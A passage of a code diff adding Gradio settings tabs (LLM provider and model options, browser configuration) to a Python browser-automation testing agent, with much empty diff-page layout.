for file_type in file_types:
|
| 40 |
+
try:
|
| 41 |
+
matches = list(Path(directory).rglob(f"*{file_type}"))
|
| 42 |
+
if matches:
|
| 43 |
+
latest = max(matches, key=lambda p: p.stat().st_mtime)
|
| 44 |
+
# Only return files that are complete (not being written)
|
| 45 |
+
if time.time() - latest.stat().st_mtime > 1.0:
|
| 46 |
+
latest_files[file_type] = str(latest)
|
| 47 |
+
except Exception as e:
|
| 48 |
+
print(f"Error getting latest {file_type} file: {e}")
|
| 49 |
+
|
| 50 |
+
return latest_files
|
src/webui/__init__.py
ADDED
|
File without changes
|
src/webui/components/__init__.py
ADDED
|
File without changes
|
src/webui/components/agent_settings_tab.py
ADDED
|
@@ -0,0 +1,241 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Agent Settings Tab
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
UI components for agent configuration and settings.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import json
|
| 13 |
+
import os
|
| 14 |
+
|
| 15 |
+
import gradio as gr
|
| 16 |
+
from gradio.components import Component
|
| 17 |
+
from typing import Any, Dict, Optional
|
| 18 |
+
from src.webui.webui_manager import WebuiManager
|
| 19 |
+
from src.utils import config
|
| 20 |
+
import logging
|
| 21 |
+
from functools import partial
|
| 22 |
+
|
| 23 |
+
logger = logging.getLogger(__name__)
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
def update_model_dropdown(llm_provider):
|
| 27 |
+
"""
|
| 28 |
+
Update the model name dropdown with predefined models for the selected provider.
|
| 29 |
+
"""
|
| 30 |
+
# Use predefined models for the selected provider
|
| 31 |
+
if llm_provider in config.model_names:
|
| 32 |
+
return gr.Dropdown(choices=config.model_names[llm_provider], value=config.model_names[llm_provider][0],
|
| 33 |
+
interactive=True)
|
| 34 |
+
else:
|
| 35 |
+
return gr.Dropdown(choices=[], value="", interactive=True, allow_custom_value=True)
|
| 36 |
+
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
def create_agent_settings_tab(webui_manager: WebuiManager):
|
| 41 |
+
"""
|
| 42 |
+
Creates an agent settings tab.
|
| 43 |
+
"""
|
| 44 |
+
input_components = set(webui_manager.get_components())
|
| 45 |
+
tab_components = {}
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
with gr.Group():
|
| 49 |
+
with gr.Row():
|
| 50 |
+
llm_provider = gr.Dropdown(
|
| 51 |
+
choices=[provider for provider, model in config.model_names.items()],
|
| 52 |
+
label="🤖 AI Service Provider",
|
| 53 |
+
value=os.getenv("DEFAULT_LLM", "openai"),
|
| 54 |
+
info="Choose which AI company's service to use (OpenAI, Google, etc.)",
|
| 55 |
+
interactive=True
|
| 56 |
+
)
|
| 57 |
+
llm_model_name = gr.Dropdown(
|
| 58 |
+
label="🧠 AI Model",
|
| 59 |
+
choices=config.model_names[os.getenv("DEFAULT_LLM", "openai")],
|
| 60 |
+
value=config.model_names[os.getenv("DEFAULT_LLM", "openai")][0],
|
| 61 |
+
interactive=True,
|
| 62 |
+
allow_custom_value=True,
|
| 63 |
+
info="Pick the specific AI model to use (like GPT-4, Claude, etc.)"
|
| 64 |
+
)
|
| 65 |
+
with gr.Row():
|
| 66 |
+
llm_temperature = gr.Slider(
|
| 67 |
+
minimum=0.0,
|
| 68 |
+
maximum=2.0,
|
| 69 |
+
value=0.6,
|
| 70 |
+
step=0.1,
|
| 71 |
+
label="🎲 AI Creativity Level",
|
| 72 |
+
info="Lower = More predictable, Higher = More creative responses",
|
| 73 |
+
interactive=True
|
| 74 |
+
)
|
| 75 |
+
|
| 76 |
+
use_vision = gr.Checkbox(
|
| 77 |
+
label="👁️ Enable Visual Analysis",
|
| 78 |
+
value=True,
|
| 79 |
+
info="Let AI see and analyze screenshots of websites",
|
| 80 |
+
interactive=True
|
| 81 |
+
)
|
| 82 |
+
|
| 83 |
+
ollama_num_ctx = gr.Slider(
|
| 84 |
+
minimum=2 ** 8,
|
| 85 |
+
maximum=2 ** 16,
|
| 86 |
+
value=16000,
|
| 87 |
+
step=1,
|
| 88 |
+
label="📝 Memory Size (Ollama only)",
|
| 89 |
+
info="How much information AI can remember at once (higher = slower but smarter)",
|
| 90 |
+
visible=False,
|
| 91 |
+
interactive=True
|
| 92 |
+
)
|
| 93 |
+
|
| 94 |
+
with gr.Row():
|
| 95 |
+
llm_base_url = gr.Textbox(
|
| 96 |
+
label="🌐 Custom API URL",
|
| 97 |
+
value="",
|
| 98 |
+
info="Only needed if using a custom AI service (leave blank for standard services)"
|
| 99 |
+
)
|
| 100 |
+
llm_api_key = gr.Textbox(
|
| 101 |
+
label="🔑 Your API Key",
|
| 102 |
+
type="password",
|
| 103 |
+
value="",
|
| 104 |
+
info="Get this from your AI service provider (OpenAI, Google, etc.)"
|
| 105 |
+
)
|
| 106 |
+
|
| 107 |
+
with gr.Group():
|
| 108 |
+
with gr.Row():
|
| 109 |
+
planner_llm_provider = gr.Dropdown(
|
| 110 |
+
choices=[provider for provider, model in config.model_names.items()],
|
| 111 |
+
label="🎯 Planning AI Service",
|
| 112 |
+
info="Optional: Different AI for planning complex tasks",
|
| 113 |
+
value=None,
|
| 114 |
+
interactive=True
|
| 115 |
+
)
|
| 116 |
+
planner_llm_model_name = gr.Dropdown(
|
| 117 |
+
label="🧠 Planning AI Model",
|
| 118 |
+
interactive=True,
|
| 119 |
+
allow_custom_value=True,
|
| 120 |
+
info="AI model for planning and organizing tasks"
|
| 121 |
+
)
|
| 122 |
+
with gr.Row():
|
| 123 |
+
planner_llm_temperature = gr.Slider(
|
| 124 |
+
minimum=0.0,
|
| 125 |
+
maximum=2.0,
|
| 126 |
+
value=0.6,
|
| 127 |
+
step=0.1,
|
| 128 |
+
label="🎲 Planning AI Creativity",
|
| 129 |
+
info="How creative the planning AI should be",
|
| 130 |
+
interactive=True
|
| 131 |
+
)
|
| 132 |
+
|
| 133 |
+
planner_use_vision = gr.Checkbox(
|
| 134 |
+
label="👁️ Enable Visual Planning",
|
| 135 |
+
value=False,
|
| 136 |
+
info="Let planning AI see website screenshots",
|
| 137 |
+
interactive=True
|
| 138 |
+
)
|
| 139 |
+
|
| 140 |
+
planner_ollama_num_ctx = gr.Slider(
|
| 141 |
+
minimum=2 ** 8,
|
| 142 |
+
maximum=2 ** 16,
|
| 143 |
+
value=16000,
|
| 144 |
+
step=1,
|
| 145 |
+
label="📝 Planning Memory Size",
|
| 146 |
+
info="How much information planning AI can remember (Ollama only)",
|
| 147 |
+
visible=False,
|
| 148 |
+
interactive=True
|
| 149 |
+
)
|
| 150 |
+
|
| 151 |
+
with gr.Row():
|
| 152 |
+
planner_llm_base_url = gr.Textbox(
|
| 153 |
+
label="🌐 Planning API URL",
|
| 154 |
+
value="",
|
| 155 |
+
info="Custom URL for planning AI service (leave blank for standard)"
|
| 156 |
+
)
|
| 157 |
+
planner_llm_api_key = gr.Textbox(
|
| 158 |
+
label="🔑 Planning API Key",
|
| 159 |
+
type="password",
|
| 160 |
+
value="",
|
| 161 |
+
info="API key for planning AI service"
|
| 162 |
+
)
|
| 163 |
+
|
| 164 |
+
with gr.Row():
|
| 165 |
+
max_steps = gr.Slider(
|
| 166 |
+
minimum=1,
|
| 167 |
+
maximum=1000,
|
| 168 |
+
value=100,
|
| 169 |
+
step=1,
|
| 170 |
+
label="🔄 Maximum Testing Steps",
|
| 171 |
+
info="How many steps AI can take to complete a task",
|
| 172 |
+
interactive=True
|
| 173 |
+
)
|
| 174 |
+
max_actions = gr.Slider(
|
| 175 |
+
minimum=1,
|
| 176 |
+
maximum=100,
|
| 177 |
+
value=10,
|
| 178 |
+
step=1,
|
| 179 |
+
label="⚡ Actions Per Step",
|
| 180 |
+
info="How many actions AI can do in each step",
|
| 181 |
+
interactive=True
|
| 182 |
+
)
|
| 183 |
+
|
| 184 |
+
with gr.Row():
|
| 185 |
+
max_input_tokens = gr.Number(
|
| 186 |
+
label="📄 Maximum Text Input",
|
| 187 |
+
value=128000,
|
| 188 |
+
precision=0,
|
| 189 |
+
interactive=True
|
| 190 |
+
)
|
| 191 |
+
tool_calling_method = gr.Dropdown(
|
| 192 |
+
label="🛠️ AI Communication Method",
|
| 193 |
+
value="auto",
|
| 194 |
+
interactive=True,
|
| 195 |
+
allow_custom_value=True,
|
| 196 |
+
choices=['function_calling', 'json_mode', 'raw', 'auto', 'tools', "None"],
|
| 197 |
+
visible=True
|
| 198 |
+
)
|
| 199 |
+
tab_components.update(dict(
|
| 200 |
+
llm_provider=llm_provider,
|
| 201 |
+
llm_model_name=llm_model_name,
|
| 202 |
+
llm_temperature=llm_temperature,
|
| 203 |
+
use_vision=use_vision,
|
| 204 |
+
ollama_num_ctx=ollama_num_ctx,
|
| 205 |
+
llm_base_url=llm_base_url,
|
| 206 |
+
llm_api_key=llm_api_key,
|
| 207 |
+
planner_llm_provider=planner_llm_provider,
|
| 208 |
+
planner_llm_model_name=planner_llm_model_name,
|
| 209 |
+
planner_llm_temperature=planner_llm_temperature,
|
| 210 |
+
planner_use_vision=planner_use_vision,
|
| 211 |
+
planner_ollama_num_ctx=planner_ollama_num_ctx,
|
| 212 |
+
planner_llm_base_url=planner_llm_base_url,
|
| 213 |
+
planner_llm_api_key=planner_llm_api_key,
|
| 214 |
+
max_steps=max_steps,
|
| 215 |
+
max_actions=max_actions,
|
| 216 |
+
max_input_tokens=max_input_tokens,
|
| 217 |
+
tool_calling_method=tool_calling_method,
|
| 218 |
+
))
|
| 219 |
+
webui_manager.add_components("agent_settings", tab_components)
|
| 220 |
+
|
| 221 |
+
llm_provider.change(
|
| 222 |
+
fn=lambda x: gr.update(visible=x == "ollama"),
|
| 223 |
+
inputs=llm_provider,
|
| 224 |
+
outputs=ollama_num_ctx
|
| 225 |
+
)
|
| 226 |
+
llm_provider.change(
|
| 227 |
+
lambda provider: update_model_dropdown(provider),
|
| 228 |
+
inputs=[llm_provider],
|
| 229 |
+
outputs=[llm_model_name]
|
| 230 |
+
)
|
| 231 |
+
planner_llm_provider.change(
|
| 232 |
+
fn=lambda x: gr.update(visible=x == "ollama"),
|
| 233 |
+
inputs=[planner_llm_provider],
|
| 234 |
+
outputs=[planner_ollama_num_ctx]
|
| 235 |
+
)
|
| 236 |
+
planner_llm_provider.change(
|
| 237 |
+
lambda provider: update_model_dropdown(provider),
|
| 238 |
+
inputs=[planner_llm_provider],
|
| 239 |
+
outputs=[planner_llm_model_name]
|
| 240 |
+
)
|
| 241 |
+
|
src/webui/components/browser_settings_tab.py
ADDED
|
@@ -0,0 +1,181 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Browser Settings Tab
|
| 3 |
+
===============================================================
|
| 4 |
+
|
| 5 |
+
UI components for browser configuration and settings.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import gradio as gr
|
| 14 |
+
|
| 15 |
+
def strtobool(val):
|
| 16 |
+
"""Convert a string representation of truth to true (1) or false (0)."""
|
| 17 |
+
val = val.lower()
|
| 18 |
+
if val in ('y', 'yes', 't', 'true', 'on', '1'):
|
| 19 |
+
return 1
|
| 20 |
+
elif val in ('n', 'no', 'f', 'false', 'off', '0'):
|
| 21 |
+
return 0
|
| 22 |
+
else:
|
| 23 |
+
raise ValueError("invalid truth value %r" % (val,))
|
| 24 |
+
import logging
|
| 25 |
+
from gradio.components import Component
|
| 26 |
+
|
| 27 |
+
from src.webui.webui_manager import WebuiManager
|
| 28 |
+
from src.utils import config
|
| 29 |
+
|
| 30 |
+
logger = logging.getLogger(__name__)
|
| 31 |
+
|
| 32 |
+
async def close_browser(webui_manager: WebuiManager):
|
| 33 |
+
"""
|
| 34 |
+
Close browser
|
| 35 |
+
"""
|
| 36 |
+
if webui_manager.bu_current_task and not webui_manager.bu_current_task.done():
|
| 37 |
+
webui_manager.bu_current_task.cancel()
|
| 38 |
+
webui_manager.bu_current_task = None
|
| 39 |
+
|
| 40 |
+
if webui_manager.bu_browser_context:
|
| 41 |
+
logger.info("⚠️ Closing browser context when changing browser config.")
|
| 42 |
+
await webui_manager.bu_browser_context.close()
|
| 43 |
+
webui_manager.bu_browser_context = None
|
| 44 |
+
|
| 45 |
+
if webui_manager.bu_browser:
|
| 46 |
+
logger.info("⚠️ Closing browser when changing browser config.")
|
| 47 |
+
await webui_manager.bu_browser.close()
|
| 48 |
+
webui_manager.bu_browser = None
|
| 49 |
+
|
| 50 |
+
def create_browser_settings_tab(webui_manager: WebuiManager):
|
| 51 |
+
"""
|
| 52 |
+
Creates a browser settings tab.
|
| 53 |
+
"""
|
| 54 |
+
input_components = set(webui_manager.get_components())
|
| 55 |
+
tab_components = {}
|
| 56 |
+
|
| 57 |
+
with gr.Group():
|
| 58 |
+
with gr.Row():
|
| 59 |
+
browser_binary_path = gr.Textbox(
|
| 60 |
+
label="Browser Binary Path",
|
| 61 |
+
lines=1,
|
| 62 |
+
interactive=True,
|
| 63 |
+
placeholder="e.g. '/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome'"
|
| 64 |
+
)
|
| 65 |
+
browser_user_data_dir = gr.Textbox(
|
| 66 |
+
label="Browser User Data Dir",
|
| 67 |
+
lines=1,
|
| 68 |
+
interactive=True,
|
| 69 |
+
placeholder="Leave it empty if you use your default user data",
|
| 70 |
+
)
|
| 71 |
+
with gr.Group():
|
| 72 |
+
with gr.Row():
|
| 73 |
+
use_own_browser = gr.Checkbox(
|
| 74 |
+
label="Use Own Browser",
|
| 75 |
+
value=bool(strtobool(os.getenv("USE_OWN_BROWSER", "false"))),
|
| 76 |
+
info="Use your existing browser instance",
|
| 77 |
+
interactive=True
|
| 78 |
+
)
|
| 79 |
+
keep_browser_open = gr.Checkbox(
|
| 80 |
+
label="Keep Browser Open",
|
| 81 |
+
value=bool(strtobool(os.getenv("KEEP_BROWSER_OPEN", "true"))),
|
| 82 |
+
info="Keep Browser Open between Tasks",
|
| 83 |
+
interactive=True
|
| 84 |
+
)
|
| 85 |
+
headless = gr.Checkbox(
|
| 86 |
+
label="Headless Mode",
|
| 87 |
+
value=False,
|
| 88 |
+
info="Run browser without GUI",
|
| 89 |
+
interactive=True
|
| 90 |
+
)
|
| 91 |
+
disable_security = gr.Checkbox(
|
| 92 |
+
label="Disable Security",
|
| 93 |
+
value=False,
|
| 94 |
+
info="Disable browser security",
|
| 95 |
+
interactive=True
|
| 96 |
+
)
|
| 97 |
+
|
| 98 |
+
with gr.Group():
|
| 99 |
+
with gr.Row():
|
| 100 |
+
window_w = gr.Number(
|
| 101 |
+
label="Window Width",
|
| 102 |
+
value=1280,
|
| 103 |
+
info="Browser window width",
|
| 104 |
+
interactive=True
|
| 105 |
+
)
|
| 106 |
+
window_h = gr.Number(
|
| 107 |
+
label="Window Height",
|
| 108 |
+
value=1100,
|
| 109 |
+
info="Browser window height",
|
| 110 |
+
interactive=True
|
| 111 |
+
)
|
| 112 |
+
with gr.Group():
|
| 113 |
+
with gr.Row():
|
| 114 |
+
cdp_url = gr.Textbox(
|
| 115 |
+
label="CDP URL",
|
| 116 |
+
value=os.getenv("BROWSER_CDP", None),
|
| 117 |
+
info="CDP URL for browser remote debugging",
|
| 118 |
+
interactive=True,
|
| 119 |
+
)
|
| 120 |
+
wss_url = gr.Textbox(
|
| 121 |
+
label="WSS URL",
|
| 122 |
+
info="WSS URL for browser remote debugging",
|
| 123 |
+
interactive=True,
|
| 124 |
+
)
|
| 125 |
+
with gr.Group():
|
| 126 |
+
with gr.Row():
|
| 127 |
+
save_recording_path = gr.Textbox(
|
| 128 |
+
label="Recording Path",
|
| 129 |
+
placeholder="e.g. ./tmp/record_videos",
|
| 130 |
+
info="Path to save browser recordings",
|
| 131 |
+
interactive=True,
|
| 132 |
+
)
|
| 133 |
+
|
| 134 |
+
save_trace_path = gr.Textbox(
|
| 135 |
+
label="Trace Path",
|
| 136 |
+
placeholder="e.g. ./tmp/traces",
|
| 137 |
+
info="Path to save Agent traces",
|
| 138 |
+
interactive=True,
|
| 139 |
+
)
|
| 140 |
+
|
| 141 |
+
with gr.Row():
|
| 142 |
+
save_agent_history_path = gr.Textbox(
|
| 143 |
+
label="Agent History Save Path",
|
| 144 |
+
value="./tmp/agent_history",
|
| 145 |
+
info="Specify the directory where agent history should be saved.",
|
| 146 |
+
interactive=True,
|
| 147 |
+
)
|
| 148 |
+
save_download_path = gr.Textbox(
|
| 149 |
+
label="Save Directory for browser downloads",
|
| 150 |
+
value="./tmp/downloads",
|
| 151 |
+
info="Specify the directory where downloaded files should be saved.",
|
| 152 |
+
interactive=True,
|
| 153 |
+
)
|
| 154 |
+
tab_components.update(
|
| 155 |
+
dict(
|
| 156 |
+
browser_binary_path=browser_binary_path,
|
| 157 |
+
browser_user_data_dir=browser_user_data_dir,
|
| 158 |
+
use_own_browser=use_own_browser,
|
| 159 |
+
keep_browser_open=keep_browser_open,
|
| 160 |
+
headless=headless,
|
| 161 |
+
disable_security=disable_security,
|
| 162 |
+
save_recording_path=save_recording_path,
|
| 163 |
+
save_trace_path=save_trace_path,
|
| 164 |
+
save_agent_history_path=save_agent_history_path,
|
| 165 |
+
save_download_path=save_download_path,
|
| 166 |
+
cdp_url=cdp_url,
|
| 167 |
+
wss_url=wss_url,
|
| 168 |
+
window_h=window_h,
|
| 169 |
+
window_w=window_w,
|
| 170 |
+
)
|
| 171 |
+
)
|
| 172 |
+
webui_manager.add_components("browser_settings", tab_components)
|
| 173 |
+
|
| 174 |
+
async def close_wrapper():
|
| 175 |
+
"""Wrapper for handle_clear."""
|
| 176 |
+
await close_browser(webui_manager)
|
| 177 |
+
|
| 178 |
+
headless.change(close_wrapper)
|
| 179 |
+
keep_browser_open.change(close_wrapper)
|
| 180 |
+
disable_security.change(close_wrapper)
|
| 181 |
+
use_own_browser.change(close_wrapper)
|
src/webui/components/browser_use_agent_tab.py
ADDED
|
@@ -0,0 +1,1299 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
